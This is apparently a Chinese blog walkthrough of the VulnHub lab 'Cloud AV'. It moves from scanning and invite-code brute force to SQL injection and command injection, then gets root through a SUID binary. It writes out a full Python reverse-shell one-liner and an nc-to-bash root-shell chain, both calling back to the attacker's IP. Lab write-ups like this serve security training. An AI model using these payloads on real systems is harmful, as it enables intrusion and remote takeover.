1、靶机信息
靶机名称:BOREDHACKERBLOG: CLOUD AV
靶机难度:简单
虚拟机环境:此靶机推荐使用Virtualbox搭建
描述:云防病毒扫描程序!是一种基于云的防病毒扫描服务。目前,它处于测试模式。系统已要求您测试安装程序并查找漏洞并升级权限。
靶机地址:BoredHackerBlog: Cloud AV ~ VulnHub
| kali服务器IP | 192.168.2.159 |
| 靶机IP | 192.168.2.154 |
2、主机发现
通过使用arp协议对同一网段的靶机进行主机发现,扫描出192.168.2.154为我们目标靶机
arp-scan -l
3、端口扫描
通过使用nmap工具对全端口进行发现,再进行版本扫描,我们发现开放22,8080两个端口,并且得知22为ssh服务,8080为http服务
nmap -p- 192.168.2.154
nmap -sV -p 22,8080 192.168.2.154
4、Web信息收集
4.1 打开8080端口,页面显示这是一款云杀毒扫描器,输入邀请码后就可以开始测试。这时候有两种思路,一种是我们可以通过逻辑漏洞进行绕过,还有一种是进行暴力破解
4.2 使用burp进行暴力破解,通过查看返回长度,只有password的值长度与其他不同
4.3 输入密码 password 成功进入系统!
5、Sql注入
5.1 除了暴力破解的方式,其实这个提交处还存在一个注入点,首先尝试使用特殊符号,查看服务端处理结果,以此判定是否存在注入点,使用burp进行截包
5.2 使用Intruder功能,payload为各类特殊符号,在结果中发现 " 的返回长度与其他特殊符号不相同,且状态码为500,其余符号的状态码均为200
!@#$%^&*()_+{}|:"<>?
5.3 进入页面查看 " 的报错信息,发现是sqlite数据库报错,可以判断出此处存在注入点,并且我们在报错信息中发现,当提交一个双引号后,被拼接到一个sql查询语句中,我们提交的双引号与第一个双引号完成了闭合,提交到了服务器,查询的内容就是; +,而语句中本身存在的双引号没办法闭合,从而出现报错注入
select * from code where password="; + " + ";
5.4 得知sql语句后,我们注入一个永真的语句,前闭合后注释,成功进入系统,我们观察到此页面是一个Linuxls-l命令回显出来的结果
" or 1=1 --
6、命令执行
6.1 我们尝试进行命令执行,我这边使用了几个语句都可以 顺利执行
cat & id
cat | id
1111 || id
6.2 查看目标服务器是否有python环境,方便我们进行反弹shell
cat | which python
7、反弹shell
7.1 使用python语句反弹shell,成功反弹
cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.159",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
7.2 我们进入上一级目录,发现存在一个编译过的文件update_cloudav,以及源码文件update_cloudav.c,并且通过查看权限,发现文件拥有SUID权限,在用户执行该程序时,用户的权限是该程序文件属主的权限,也就是我们在执行该程序时将暂时获得root权限
7.3 查看c源代码文件,我们发现程序定义了一个执行参数,如果程序在执行中不包含参数,那么会打印出这段话:This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;如果我们执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新
8、提权
8.1 在这里我们可以尝试执行此程序,并通过命令注入的方式,利用SUID权限,使用root权限执行命令,在这里我们输入参数1234,并使用nc反弹shell,最终拿到root权限!
./update_cloudav "1234 | nc 192.168.2.159 5555|/bin/bash|nc 192.168.2.159 6666"
6189
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
